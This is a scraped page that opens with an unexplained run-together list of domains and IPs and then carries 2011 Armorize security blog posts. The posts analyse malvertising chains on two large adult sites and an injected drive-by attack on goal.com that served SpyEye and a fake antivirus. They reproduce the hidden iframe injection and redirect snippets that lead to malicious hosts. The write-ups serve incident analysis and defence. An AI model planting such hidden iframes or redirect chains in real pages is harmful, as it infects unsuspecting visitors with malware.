lanca.comhttp://toccatacollection.comhttp://bestyoungdesigner.comhttp://fitnessworld.ithttp://vikram.inhttp://kinseydesigns.co.ukhttp://dansawi.comhttp://drubet.comhttp://abil-collection.comhttp://kardayim.comhttp://bepadong.vnhttp://fatmagulunsucuneizle.inhttp://futuristicgases.comhttp://www.geranges.infohttp://bytim.nethttp://www.bbwonlinedating.infohttp://nhlturniri.myspot.lvhttp://mariogamesplay.comhttp://quanvbpl.vnbis.comhttp://www.jornalforum.comhttp://www.autopartsgiant.infohttp://routeone-solutions.co.ukhttp://muammerkuyumcu.comhttp://usacheap.ushttp://centralcanaria.comhttp://terraespiritual.orghttp://www.casino-card-game.comhttp://valley-industries.com.auhttp://alternativetohotel.comhttp://www.bharatvision.inhttp://camara.loba.eshttp://papagalos.grhttp://www.internetreklamciligi.orghttp://bedrijfswagenpagina.nlhttp://www.canastasyregalos.comhttp://paintball35.comhttp://mehmetalperen.comhttp://prepaidcreditcardstips.comhttp://telefonyforum.plhttp://dieworks.nethttp://delart.com.pehttp://istanbulcheaphotels.comhttp://przedmiotyszkolne.plhttp://bluehilltulamben.comhttp://sport-world.ithttp://nlcthailand.comhttp://purposeandpower.orghttp://travelbymile.comhttp://topsportsgames.comhttp://feeder-gastronomia.plhttp://pjdcommunity.com.myhttp://thiguide.comhttp://eglen.bizhttp://templatez.orghttp://fotosnimka.comhttp://www.saloon79.com.brhttp://www.selinc.com.pehttp://rogazduire.rohttp://wkschool.orghttp://pl4y312.comhttp://tripreports.nlhttp://house67.comhttp://gll.infohttp://www.lcdsonytv.comhttp://topupd.comhttp://zankov.infohttp://didinpen.comhttp://rsoftware.nethttp://krizztov.comhttp://www.desguacepabloehijos.comhttp://imaginup.euhttp://cauvong.com.vnhttp://bistromargaux.behttp://oomsindia.comhttp://tunajlucas.comhttp://champ.kanevsk.ruhttp://hosting.kanevsk.ruhttp://kolos.kanevsk.ruhttp://news.kanevsk.ruhttp://inter-war.plhttp://buy-snacks-online.comhttp://www.vejpongosot.comhttp://jaarringfestival.nlhttp://saudefrugal.comhttp://igvin.ruhttp://sdkrezekne.lvhttp://qcom24.comhttp://motocat.nethttp://iryt.plhttp://www.saraykisla.comhttp://www.gis-expert.plhttp://www.metapo.comhttp://plaster-studio.comhttp://www.ambio.grhttp://watchmoviefullfreeonline.comhttp://chipchecker.comhttp://homebox.co.thhttp://www.jm-interior.comhttp://bkdsamarinda.web.idhttp://wonderpoems.comhttp://carmenotokiralama.comhttp://delekkerbek.nlhttp://amilliondollarpage.comhttp://www.spnovidom.ruhttp://dalyantr.comhttp://www.valservicios.eshttp://www.ags71.comhttp://sdnkauman1-malang.sch.idhttp://www.affiloramax.infohttp://pink2cake.comhttp://pms.behttp://lacasadelaluna.com.uyhttp://horeca-bouwnet.nlhttp://artiyono.comhttp://kadinkadinayiz.comhttp://gemininirman.comhttp://emlakt.comhttp://beczkaprzezswiat.plhttp://www.anubalpisanwit.ac.thhttp://crthailand.comhttp://greeteasy.comhttp://dveri-plus.com.uahttp://kuntaluk.comhttp://smackdownizle.gen.trhttp://www.lucktocasino.comhttp://www.okaraburgu.comhttp://yerelim.comhttp://simcentral.plhttp://hitmanjazz.comhttp://sisteinfor.com.arhttp://adultalem.ushttp://organicgreenfoods.comhttp://www.ustunfotokopi.comhttp://galleriaopticalva.comhttp://krystynazgazowni.plhttp://bestannonce.comhttp://www.forumarena.nethttp://seb-annu.comhttp://serkansuphiteker.comhttp://www.reachingtheimpossible.comhttp://wildniteradio.comhttp://dskomp.plhttp://grafineri.comhttp://why-do.comhttp://pawelmakowski.plhttp://jbb.mzhost.plhttp://www.sonsoz.orghttp://istanbulisokullari.comhttp://impulsaperu.comhttp://fisicamoral.clhttp://emsgroupltd.comhttp://www.bestwholesaleclothing.comhttp://ourforstmt2.nethttp://studiodada.bizhttp://autoventas.com.uyhttp://gayortam.comhttp://cosmosuae.comhttp://themhouse.inhttp://pickfonts.comhttp://aliceinchains.plhttp://www.labelsexy.comhttp://tuperfumeonline.comhttp://geld-lenenbkr.comhttp://maheshwari-samaj-ludhiana.comhttp://chimalsi.skhttp://microstart.nethttp://www.shinchanphotos.comhttp://drdaybytukta.comhttp://maciejweigel.plhttp://clubs4cash.nethttp://www.blackwelltrader.comhttp://radharanimarbles.comhttp://inspirativemedia.comhttp://christmasmyspacegraphics.comhttp://hiteshbavaliya.comhttp://health-book.nethttp://semerkandgonulluleri.comhttp://gardenstory.plhttp://mediapembelajaranonline.web.idhttp://huseyin-yucel.comhttp://e2e.co.idhttp://www.ismailcetisli.comhttp://danathemedesign.comhttp://webdevbg.comhttp://data-sistem.comhttp://bouncingaround.co.ukhttp://fiilmizleyin.comhttp://miloevents.comhttp://thewisdomwell.comhttp://robota.web.idhttp://advero.plhttp://www.eprintbox.plhttp://linguafit.iehttp://www.turbulencetrainingv.infohttp://olivebranchtours.comhttp://dglproducts.comhttp://sppba.ruhttp://ecoalarm.orghttp://podorzechem.info.plhttp://compesacampeche.comhttp://interiorni.comhttp://serwer.fhuzico.plhttp://greenstreet-bg.comhttp://dalyan1.comhttp://easywayshoping.comhttp://www.caodaitodinhchieuminh.com.vnhttp://www.petit-nanterre.orghttp://splashmarketing.com.vnhttp://zzdpawlowice.plhttp://www.kaleane.comhttp://datquatet.comhttp://dirty.lthttp://xe-vn.nethttp://pinata.cahttp://likesy.plhttp://sukcesteam.euhttp://oyundatek.nethttp://4garcons.comhttp://buga.com.trhttp://dalyanhaber.comhttp://gorrasdorita.comhttp://guvercinim.nethttp://www.dedmi.comhttp://auto-xenon.ruhttp://webmarx.nlhttp://passionostra.comhttp://franciscodeaguirre.clhttp://erdoganardic.comhttp://yelkenmt2.comhttp://www.spbu.com.uyhttp://kayseriotokiralama.bizhttp://hitsozluk.comhttp://hopehealdream.comhttp://makemoneyfromonlinebusiness.orghttp://santamargarita.edu.pehttp://sahinlerkoyu.tkhttp://triptobulgaria.euhttp://highpoint-asia.comhttp://istanbulkulturdans.comhttp://erolaltun.comhttp://izmircetesidizi.comhttp://www.forekshisse.comhttp://efektifsanat.comhttp://www.bestfullgames.comhttp://www.jardinoshop.nethttp://seo.beslim.nethttp://thecreativegenie.com.auhttp://kolderecumhuriyet.k12.trhttp://resepcemilan.comhttp://quaxuan.comhttp://abtnapho.go.thhttp://fullresellrightsoftware.comhttp://web-challenge.nethttp://pc-garage.nlhttp://lotussoftware.nethttp://www.mybizniz.infohttp://www.forekstakas.nethttp://splavviva.comhttp://cikita.orghttp://www.therioclub.comhttp://energieressourcen.euhttp://bahtr.comhttp://redajans.comhttp://macitozcan.comhttp://sieunhan.infohttp://www.omg-magazine.comhttp://deneme.drturkiye.comhttp://lenguyenjsc.comhttp://hkorte.nethttp://www.belekturkey.comhttp://dalyanhomes.nethttp://dalyanholiday.nethttp://holidaycome.comhttp://dmfyapim.comhttp://bubble-express.comhttp://www.evdenevenakliyatucretleri.orghttp://duygusalforum.nethttp://www.argunsahlar.comhttp://www.pfmfastdl.ptclans.infohttp://howorx.infohttp://koco.bizhttp://www.eraydans.comhttp://goldenoldieskusadasi.comhttp://www.cwlrc.orghttp://banquatet.comhttp://zone-page.comhttp://11-88-studios.comhttp://173.192.232.16http://174.122.55.234http://174.133.203.115http://174.133.203.116http://178.162.244.134http://188.165.185.176http://203.146.251.210http://209.62.120.59http://209.62.24.211http://209.62.24.212http://209.62.24.213http://217.117.28.54http://38metin2.comhttp://4explorer.comhttp://4nicetime.comhttp://66.147.239.103http://67.19.62.251http://70.86.154.56http://74.82.53.158http://78.46.102.74http://87.98.218.117http://94.103.40.65http://abitareconstile.comhttp://abunchoftwolips.nlhttp://acebook.gurlville.comhttp://actechdz.comhttp://acupunturayuang.clhttp://administrare-cladiri.rohttp://ad-pay.plhttp://adroiterz.comhttp://akpro.plhttp://alannahgunter.gen.nzhttp://alexeybakhtin.comhttp://alfom.comhttp://alisonlynch.infohttp://allmasscreation.comhttp://al-masoad.comhttp://alt7.infohttp://alwaysvacationtour.comhttp://americanbanker.orghttp://americanmobilephone.comhttp://anashacorp.comhttp://anugrah-abadi.comhttp://anwarulquranonline.comhttp://apdc.com.brhttp://archishots.comhttp://aristidepaun.rohttp://asianhouse2005.comhttp://av360solutions.comhttp://axoncreativo.comhttp://aybastitalebeyurdu.comhttp://azcpagency.comhttp://b2bblue.comhttp://backpackerinkawasi.comhttp://bankaolaem.comhttp://bastation.comhttp://baypubadv.comhttp://bbconnect.beenet.in.thhttp://be3.com.arhttp://beatabrzoza.plhttp://benjalak.co.cchttp://bestforexacademy.comhttp://beypazariseker.comhttp://bgtopproperty.comhttp://bhartiyasamaj.org.nzhttp://bijuarez.comhttp://bingoltime.comhttp://blissrhythm.comhttp://bodrumdenizevleri.comhttp://bodyhome.co.ukhttp://bombel.orghttp://borkro.comhttp://bosstasarim.nethttp://brain-care.comhttp://brownpaper.co.thhttp://bungaloff.ruhttp://cabaniaslejanoeste.com.arhttp://callieandcompany.comhttp://carreramaleconcampeche.comhttp://cassiamatos.com.brhttp://celalalt.rohttp://cenit.org.pehttp://cevdetogullari.com.trhttp://changedlifeseminar.comhttp://chantelb.comhttp://cherrydirect.co.ukhttp://chezarthur.comhttp://chinabetpoker.comhttp://chinapartypoker.comhttp://chinapokerbet.comhttp://chipmaster.pthttp://chsch.ac.thhttp://citycm.comhttp://clahrc-cp.orghttp://cleanhouseskusadasi.comhttp://colincampbell.co.ukhttp://contech05.comhttp://cplinmobiliaria.comhttp://csswebsitedesign.cahttp://cuvenet.behttp://dakkapel-tips.nlhttp://damarlidernegi.comhttp://datingsites-overzicht.comhttp://datvietshop.comhttp://ddc.bialystok.plhttp://dekoratifoluk.comhttp://dev-it.aptests.nethttp://directorysubmitter.inhttp://discreetfotoafdrukken.nlhttp://divels.byhttp://diziizledizi.tkhttp://djpmpro.comhttp://dodiindra.comhttp://donabis.com.brhttp://ekudakov.ruhttp://elider.org.pehttp://emlakdost.comhttp://enwgroup.comhttp://ephos-bg.comhttp://equipedeponta.com.brhttp://erenerdogan.com.trhttp://escaleras-delko.comhttp://escortbayanla.comhttp://esdthailand.comhttp://estudio-zero.comhttp://eugeniasilva.euhttp://evasachsdesigns.comhttp://evelyncampbell.co.ukhttp://eventuresnet.comhttp://evonutrion.comhttp://facebook.gurlville.comhttp://fethiyecarrental.nethttp://filoilkogretim.comhttp://fitnessbuckinghamshire.comhttp://fitness-magazine.orghttp://fluxusministerija.lthttp://flytochina.nlhttp://fok-lo.nohttp://forextradingebooks.comhttp://forumarena.nehttp://fotografiakostrzewa.plhttp://fp.funbite.comhttp://frankhoes.nlhttp://gacashcows.comhttp://gamefountain.comhttp://gdp.co.thhttp://geldlenen-zonder-bkr.nlhttp://gemilangsejati.comhttp://genteygestion.comhttp://gfoods-bg.comhttp://gipsbruk.comhttp://gisdurentiga.comhttp://globalinvestmentg.comhttp://golfcoursemarket.nethttp://golftrend.nethttp://grafabrica.comhttp://grupoipc.comhttp://grzelczak.euhttp://guitare-basse.infohttp://guitarproduction.com.uahttp://haezor.comhttp://haftylogo.plhttp://herrydirect.co.ukhttp://hetboomhuis.nlhttp://hiszpanski-nauka.plhttp://hitachiservice.in.thhttp://hit-mu.nethttp://hlosportales.comhttp://hondzik.orghttp://hqguvenlik.comhttp://hrmperu.comhttp://hr-ramenendeuren.behttp://humusliving.comhttp://iamadiabetic.inhttp://iceinnpattaya.comhttp://ifhchile.clhttp://igrushkin.com.uahttp://ilk-ay.nlhttp://imaxcreative.com.arhttp://imazan.comhttp://imperialmorocco.comhttp://incrementalism.comhttp://infidel.plhttp://infobox.kzhttp://infra.byhttp://Ingallery.comhttp://inomessiniaki.grhttp://integra.co.thhttp://intelisystemstest.comhttp://intermultas.com.brhttp://itmobile.sghttp://izabelamichta.plhttp://izoflor.bghttp://japanathome.nethttp://jbinstel.plhttp://jgceramics.co.ukhttp://justinasburokas.lthttp://kalld.comhttp://kamera-guvenlik-sistemleri.comhttp://karamanesnafrehberi.comhttp://khadijahtulquran.comhttp://kindhearts.infohttp://klik-hosting.nlhttp://kontrakt-avto.ruhttp://koolthailand.comhttp://kotran.nethttp://kotvis.nlhttp://krieserdrywall.comhttp://krissybee.comhttp://krupreeda.comhttp://kuiperssporthalbeheer.nlhttp://kusu.org.trhttp://kwb-stltongeren.behttp://laisvai.lthttp://laygoeye.comhttp://lego-hogwartscastle.comhttp://lewis-ny.comhttp://linsy.co.cchttp://livezilla.802-x.comhttp://lkayinsurance.comhttp://lodzcs.plhttp://lortonmitchellhomes.comhttp://lost-in-wonderland.nethttp://lr-studio.ruhttp://macaupokerbet.comhttp://macoeng.comhttp://maduraja.comhttp://magos.com.uahttp://mangmeeprint.comhttp://mapletreefoundation.nethttp://marinapointetobacco.comhttp://markworld.nlhttp://marmipex.plhttp://maxlifeshop.co.ukhttp://mbadirections.comhttp://mbeydogan.comhttp://megamoneymarketinginfo.comhttp://mertasktosun.comhttp://metodebisnis.nethttp://migliato.com.brhttp://milliondollarpage.cahttp://mlmy.edu.plhttp://monseb72.comhttp://montazysci-okien.plhttp://moraycampbell.co.ukhttp://moto-planet.plhttp://mseshk.comhttp://mssugarvintage.comhttp://mudpots.comhttp://multimarx.nlhttp://municipiodecampeche.gob.mxhttp://muzaffersutluoglu.comhttp://muze-news.infohttp://muzikplatformu.comhttp://muzoliada.plhttp://myanmarvillage.comhttp://my-garden.plhttp://myhonda.web.idhttp://mymmlive.nethttp://naniglobal.comhttp://navtrack.euhttp://necropsya.comhttp://netuser.plhttp://neyilesifa.comhttp://nicolaszuliani.com.arhttp://noclegi-zwierzyniec.plhttp://npc-oniks.ruhttp://nsquare-organize.comhttp://obamahomerecovery.comhttp://oldiesgeneration.comhttp://omegasystems.euhttp://onedepot.com.arhttp://oo-grupazachodnia.plhttp://orcunilbeyli.comhttp://osk-kurzawa.plhttp://ostylist.comhttp://ots.com.pehttp://oxigame.nethttp://paginifunerare.rohttp://paintballossa.plhttp://parthtechnologies.comhttp://paslanmazelekteli.nethttp://pccompakca.com.vehttp://pcnet2u.comhttp://penerbit-ombak.comhttp://perdeto.comhttp://pete-mitchell.comhttp://petkidis.comhttp://phuketmatrioshkatour.ruhttp://physioplusfootscray.com.auhttp://picktemplates.comhttp://pickwallpapers.comhttp://pinfeng163.comhttp://plandela.comhttp://plengpracha.comhttp://pointmangroup.orghttp://premier-league.lthttp://pro-agency.plhttp://proballvip.comhttp://profindo.nethttp://proforhum.org.pehttp://protectourlocalschools.orghttp://p-traveler.comhttp://puertociudad.mxhttp://qednet.nethttp://ravaela.nlhttp://realpay.plhttp://redcherryproject.co.ukhttp://renkgazetesi.comhttp://reprint.clhttp://residencialcocoverde.comhttp://reunanen.infohttp://riskreform.comhttp://roof.byhttp://sahinerbas.comhttp://sapa2.ac.thhttp://satmegalus.comhttp://sbwl.orghttp://schoolhouse.com.pehttp://schulzfamilie.comhttp://serwery-cs.nethttp://serwkomp-houm.plhttp://setsoft.nethttp://shonacampbell.co.ukhttp://shoreline.inhttp://shriganeshportraits.comhttp://silenceforce.behttp://simplyheavenbaby.comhttp://siobhancampbell.co.ukhttp://small-servers.comhttp://smyrna.gehttp://snoezelenzo.nlhttp://solusstudio.plhttp://somuncuinsaat.com.trhttp://soorajmull.nethttp://spec24.com.plhttp://star-gom33ki.comhttp://stolarz-bydgoszcz.infohttp://supersmarthosting.comhttp://support.802-x.comhttp://svetlanashkrebtan.comhttp://sweetzplaza.comhttp://tabanflourmills.irhttp://taitoudesign.comhttp://tasavang.comhttp://tathastustudios.comhttp://tattoo-weglaseren.nlhttp://teamroomonline.comhttp://terraval.nethttp://thaigiftshop.bizhttp://thaimueangecotourism.comhttp://thanlnw.tkhttp://thespagroup.co.thhttp://thesuperstock.comhttp://thomaspage.dkhttp://tmwmetal.comhttp://toprakko.tkhttp://tradicionesdelperu.com.pehttp://turkey-thailand.comhttp://tutsbox.comhttp://twitterlays.comhttp://ulusmobilya.nethttp://unicornteleservices.comhttp://uniline-international.comhttp://uni-prof.ruhttp://vanfolklordernegi.comhttp://vangarderen.orghttp://vanozelders.comhttp://vavilon-bg.nethttp://vegaspokerbet.comhttp://vfxmaking.comhttp://vidhisec.comhttp://vioutlet.comhttp://viptimegift.comhttp://vittalys.clhttp://wangsingresort.comhttp://watorachacha.comhttp://wawer-szkolajazdy.plhttp://webbladeren.nlhttp://webhostbangkok.comhttp://webmasterphuket.comhttp://weddingparadisephuket.comhttp://weight2loss.comhttp://welltour.kiev.uahttp://wickedcigarettes.comhttp://witteveenreclame.nlhttp://wizart-studio.plhttp://www.108vintage.comhttp://www.ahdvietnam.comhttp://www.altincilekfiyati.comhttp://www.armiyadisignori.comhttp://www.avv-roermond.nlhttp://www.baracca.jphttp://www.bestadvice.rohttp://www.bspsac.nehttp://www.bspsac.nethttp://www.cbooy.comhttp://www.chawkacherresort.comhttp://www.christodoulidi.grhttp://www.chrometuner.comhttp://www.cihatkablan.com.trhttp://www.clubesocialkz.com.brhttp://www.demirgucbirligi.comhttp://www.discount-gas-coupons.comhttp://www.dsmartkampanya.orghttp://www.eigencreche.behttp://www.erdemmutfak.com.trhttp://www.er-web.nethttp://www.eshraq.pshttp://www.e-starprint.comhttp://www.forester58.comhttp://www.fsseguros.nethttp://www.gallerytaskoff.comhttp://www.guranorman.comhttp://www.gurelkosdemir.comhttp://www.hdtvbestselleronsale.comhttp://www.hokseng.comhttp://www.hristravel.comhttp://www.i-creative.plhttp://www.incalifehostel.comhttp://www.jewsengheng.comhttp://www.johnsdarkroom.cahttp://www.kangzensuphan.comhttp://www.knifesharpeningservices.bizhttp://www.ladyai.go.thhttp://www.lezizlezzet.com.trhttp://www.louisquail.comhttp://www.magicjoefuncenters.dehttp://www.mastermindfarms.orghttp://www.microart.bizhttp://www.minosoma.com.plhttp://www.m-norte.nethttp://www.mymatematik.comhttp://www.nettrafficbrokers.comhttp://www.newsoutreach.orghttp://www.occasiecars.behttp://www.peruenred.nethttp://www.phannoiwit.comhttp://www.phfirc.orghttp://www.pieandahat.comhttp://www.project-pc.ithttp://www.promotioncheck.comhttp://www.rafaello-trading.comhttp://www.redsna.comhttp://www.renklima.comhttp://www.sem-elektrik.comhttp://www.sindhudurgdccb.comhttp://www.sin-eido.jphttp://www.smibilingual.comhttp://www.solar-it.comhttp://www.somyotweb.comhttp://www.subhobibaho.comhttp://www.subtakean.go.thhttp://www.sukpriwan.comhttp://www.teepak4you.comhttp://www.thaigraphic.comhttp://www.thaimark.com.plhttp://www.thuiszorgzaam.nlhttp://www.tipthailand.nethttp://www.tostell.comhttp://www.triplechip.nethttp://www.ubon-cybercare.comhttp://www.ulusevdenevenakliyat.comhttp://www.urkobtt.comhttp://www.vankulturturizm.comhttp://www.vbac-club.comhttp://www.vkhospital.com.vnhttp://www.walidonsy.comhttp://www.yesilirmakdershanesi.comhttp://www.zsmokre.plhttp://wwwtrac.comhttp://wyszynykoscielne.plhttp://xn--enyakn-t9a.comhttp://yazilimdenizi.comhttp://yelmosplace.com.arhttp://zajazd-staropolski.com.plhttp://zlinki.comhttp://zodiak-garden.nl

Porn sites have lots of traffic...and malvertisements

2011-05-23T09:03:00.000-07:00

(Credits: Chris Hsiao, NightCola Lin, Wayne Huang)

If you walk into our office after work hours and see a couple of us surrounding Chris' seat, starring at his multiple big screens showing lots of porn....believe us we'll actually working hard.

At Armorize we actively scan the Web for malware. Of course we can't cover the entire Web so we try to at least have a decent coverage of the bigger Websites. When we setup the platform sometime in the past, one thing we immediately noticed was: wow, so a good percentage of the "bigger Websites" on the internet (those with lots of traffic) are porn sites!

And then as we started to run the scanning operation we soon also realized that porn sites not only have a lot of traffic, but they often fall victim to malvertising.

In malvertising, malicious advertisements (malvertisements) are served by publishers (websites) to visitors. If the malvertisement involves drive-by download exploits, then the visitor can get infected without him knowing anything or having to click on or agree to anything.

Here's our report of how an malicious advertiser, celeb-escorts.com, got two very large websites to serve its malvertisement.

The first website is pornhub.com, Alexa Top 62 with 23,873,546 unique visitors per day.

Very large traffic indeed. Malvertisement provided to pornhub.com by etology.com, an ad exchange. etology loads the malvertisement from its advertiser, celeb-escorts.com, whose domain was created on May 11th, 2011. And so, it is very possible that celeb-escorts.com was registered by a malicious party with the purpose of submitting malvertisements to AD networks and exchanges. Below is an illustration of the parties involved:

This is the particular malvertisement from celeb-escorts, that included an iframe to tun4atta.in, the start of a chain of malicious domains:

Here are the detailed chain and code snippets:

1. http://www.pornhub.com/

2. http://delivery.trafficjunky.net/deliver2.php?zone_id=5&site_id=2&c=frontpage

3. http://delivery.trafficjunky.net/batch/bootstrap-ph-footer/

4. http://delivery.trafficjunky.net/batch.php?&data=%5B%7B%22unique%22%3Atrue%2C%22spots%22%3A%5B%7B%22site%22%3A2%2C%22zone%22%3A27%2C%22element_id%22%3A%22footer1%22%2C%22context%22%3A%22%22%2C%22userContext%22%3A%22%22%7D%2C%7B%22site%22%3A2%2C%22zone%22%3A27%2C%22element_id%22%3A%22footer2%22%2C%22context%22%3A%22%22%2C%22userContext%22%3A%22%22%7D%2C%7B%22site%22%3A2%2C%22zone%22%3A27%2C%22element_id%22%3A%22footer3%22%2C%22context%22%3A%22%22%2C%22userContext%22%3A%22%22%7D%5D%7D%5D&_callback=window.request.onSuccess%28%29

5. http://media.trafficjunky.net/cdn_custom_ads/cpakarll/etologyftsq.html

6. http://pages.etology.com/imp2/93114.php


<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title></title></head><body style="border:0px;margin:0px"><script type="text/javascript">var ad={space:{id:93114,type:2,alignment:2,publisherid:52408,siteid:85149,cobrandingid:1,spacename:'Pornhub 300x250 footer rev',domain:'http%3A%2F%2Fwww%2Epornhub%2Ecom',broker_link:'http://www.etology.com/buying-space-detail.php?id=93114&EID=77408',click_target:'_blank',enable_auto_collapse:'no',style1:{width:300,height:250,rows:1,cols:1,broker_link:'Advertise Here',show_broker_link:'false',background_color:'TRANSPARENT',table_style:'cellspacing=3',border_style:'',title_style:'',description_style:'',broker_link_style:'font-size:11px;font-family:Arial;color:#000000;text-align:center;text-decoration:;font-weight:;font-style:',resize:'false'},style2:{},galleries:[{id:2624,handle:'Jiwon',age:'21',headline:'want my Black Hole?',version_number:'1',media_ext:'gif'},{id:2754,handle:'Bekky',age:'19',headline:'Are thier any single fathers?',version_number:'1',media_ext:'gif'}]},payments:[{link:'http%3A%2F%2F',isAutoCollapseAd:'no',is3rdPartyAd:'true',id:174131,adid:174131,advertiserid:51689,bannerCode:"\074iframe src=http://celeb-escorts.com/banners/300x250.jpg width=\'300\'\r\nheight=\'250\' frameborder=\'0\' scrolling=\'no\' marginheight=0\r\nmarginwidth=0>\074/iframe>",matched_keyword:'',pass_search:''}],proxy_domain:'',clicks:['6f3dff7061a304100b74ca4bbb55a0c0dc36f1d720f4ec84cbd6883f8541ec4c5c28a159f6fc7bd4d7731ac4f29e3654eb845de85231ecf48201be15b98bad226e80eeb5f5e7c9a5']};</script><script type="text/javascript" src='http://media.etology.com/transformer/v41/ads2.js'></script></body></html>

7. http://celeb-escorts.com/banners/300x250.jpg


<a href='http://celeb-escorts.com/' target='_parent'><img src='http://celeb-escorts.com/images/banner-300x250.jpeg'  border=0></a><iframe src='http://tun4atta.in/bcounter.php?u=adult' width='46' height='51' frameborder='0' scrolling='no'></iframe>

8. http://tun4atta.in/bcounter.php?u=adult


<iframe width='34' height='44' frameborder='0' scrolling='no' src='http://iban6duo.in/ts/in.cgi?adult'></iframe>

9. http://iban6duo.in/ts/in.cgi?adult


<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb'">
</head>
<body>
document moved <a href="http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb">here</a>
</body>
</html>

10. http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb
(Above serves the final malware)

The browser exploits were serving using the Black Hole exploit pack. The finally installed malware kept on changing since our initial discovery on May 13th.

The initial malware that was installed on vistors' machines was SpyEye, a crimeware similar to Zeus. Antivirus detection rate at that time was 3 out of 42 vendors on VirusTotal; it has since increase to 21 out of 42 vendors.

The current malware being served is still SpyEye, but re-packed and thus having a 5 out of 42 detection rate on VirusTotal.

The second website is tube8.com, Alexa Top 113 with 10,885,350 unique visitors per day.

The top-level AD agency is the same--Traffic Junky (trafficjunky.net), and the AD exchange is the same as well--etology.com. We can actually see the same malvertisement from celeb-escorts.com on tube8.com:

Below is an illustration of the chain:

The detailed traffic chain is below:

1. http://tube8.com

2. http://delivery.trafficjunky.net/deliver2.php?zone_id=42&site_id=13&cache=1305558225&c=HomePage

3. http://media.trafficjunky.net/cdn_custom_ads/pornhublive/T8ftphl.html


<iframe src="http://ifa.camads.net/dif/?cid=tube8-footer-950x300" allowtransparency=true width=950 height=300 frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

4. http://ifa.camads.net/dif/?cid=tube8-footer-950x300

5. http://pages.etology.com/imp2/96244.php

6. http://celeb-escorts.com/banners/300x250.jpg

7. http://tun4atta.in/bcounter.php?u=adult


<iframe width='34' height='44' frameborder='0' scrolling='no' src='http://iban6duo.in/ts/in.cgi?adult'></iframe>

8. http://iban6duo.in/ts/in.cgi?adult


<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb'">
</head>
<body>
document moved <a href="http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb">here</a>
</body>
</html>

9. http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb
(Above serves the final malware)

With these two sites having 23,873,546 and 10,885,350 unique visitors per day, respectively, and serving this malvertisement from celeb-escorts.com since May 13th, there should have been a good number of infected visitors.

Goal.com spreading malware again: "Security Shield" fake anti-virus

2011-05-17T17:58:00.000-07:00

(Credits: Chris Hsiao, NightCola Lin, Wayne Huang)

In our last post we researched Goal.com's infection and one of our conclusions were: "From what we've collected, parts of goal.com seem to have been compromised allowing the attacker to manipulate content at will. A backdoor may exist to allow the attacker continuous control of goal.com's content."

That infection was eliminated from Goal.com a day later. However, HackAlert just flagged a new infection, suggesting that the attacker should have a backdoor into Goal.com. This time, they've made Goal.com serve a fake anti-virus software called "Security Shield."

[Summary]

Behavior: Users visit Goal.com, and are served with malicious scripts residing on 31d6f5art8.co.be, which starts a drive-by download process that installs Security Shield into the vistors' machines, without having to trick the visitors into doing anything or clicking on anything. Simply visiting the page infects the visitors. Security Shield will continuously pop up fake alerts and launch browsers to open porn sites, and only stops after a "license" has been purchased. Rebooting will not remove this malware; it's installed in the victims' machines and will always execute.

The exploit domain (a78hl7zv4p.co.be) only serves to each IP once.

Very quickly after the initial publication of this post, the attacker quickly retired the above-mentioned pair of malicious domains, and used a new pair: zfdim0u06t.co.be and 4t7uxaxrg8.co.be. When we modified our blog again, they retired the new pair, and replaced with a third pair: uzldzzzeo3.co.be and zepa6hr6jk.co.be.

Detection rates:
The malicious domains include 31d6f5art8.co.be, a78hl7zv4p.co.be, zfdim0u06t.co.be, and 4t7uxaxrg8.co.be. None has been flagged by any of the 18 supported blacklists on urlvoid.com. As for Goal.com, itself, the same--0 out of 18 vendors on urlvoid.com.

The binary executable for Security Shield triggered only 6 out of 42 vendors on VirusTotal.

Technique used:
Drive-by download, attacker has control of Goal.com's content. Not malvertising.

Below is a video of the entire infection process, from initially visiting goal.com, to later ending up with a fake antivirus on the system.

[The Infection]
The injection point was [http://www.goal.com/en], and the injected code was:


<div id="eplayer">
<style type="text/css">#adtfd {width: 1px;height: 1px;frameborder: no;visibility: hidden;}</style>
<iframe id="adtfd" src="http://31d6f5art8.co.be/ad.jpg"></iframe>
</div>

Which then generates and iframe to http://a78hl7zv4p.co.be/domains/buy, which then serves the exploit code. Upon successful exploitation, the browser process connects to the following URL format and downloads Security Shield:
http://a78hl7zv4p.co.be/domains/bf02bde9910ff9be016eb48ac5a51043.php?thread_id=2&f=63444537&topic_id=buy&

Security Shield installs itself into the system and starts to show fake alerts and pop up browsers to open porn sites:

[The Detection]
The binary executable for Security Shield triggered only 6 out of 42 vendors on VirusTotal.

As for Goal.com, 0 out of 18 vendors on urlvoid.com has flagged them:

Goal.com receives 232,116 unique visitors per day according to compete.com, 215,989 according to checksitetraffic.com, and ranks 379 globally on alexa.com.

Goal.com serving malware

2011-05-02T03:59:00.000-07:00

(Credits: Chris Hsiao, NightCola Lin, Wayne Huang)
(Follow up post on reinfection posted May 17th)

Goal.com receives 232,116 unique visitors per day according to compete.com, 215,989 according to checksitetraffic.com, and ranks 379 globally on alexa.com.

Recently between April 27th to 28th, it was detected by HackAlert to be actively serving malware (drive-by downloads). From what we've observed, we believe the attacker has a way into goal.com's system and was only testing during this time. This is our technical report.

[Summary]

A. From what we've collected, parts of goal.com seem to have been compromised allowing the attacker to manipulate content at will. A backdoor may exist to allow the attacker continuous control of goal.com's content.

B. During this time we've observed different malicious scripts injected into goal.com, leading us to believe that this isn't a one-time mass SQL injection attempt. We've also not found the injected content to appear in other websites.

C. The malicious domains include:
1. pxcz.cz.cc, which is neither being flagged by any antivirus blacklist nor by Google SafeBrowsing.
2. opofy7puti.cz.cc, which is neither being flagged by any antivirus blacklist nor by Google SafeBrowsing.
3. justatest.cz.cc, which is neither being flagged by any antivirus blacklist nor by Google SafeBrowsing.

This further suggests that this is an attack targeted at goal.com

D. Duration was between April 27th to 28th. The attacker seemed to be testing their injections and was picked up by our scanners.

E. Browser exploits used during this "test-drive" included: CVE-2010-1423 (Java), CVE-2010-1885 (MS help center HCP), CVE-2009-0927 (PDF), and CVE-2006-0003 (MS MDAC).

F. The g01pack exploit pack was being used. It includes a fake admin page which is used as a honeynet for security researchers--to allow the attacker to observe who is studying their malicious domains.

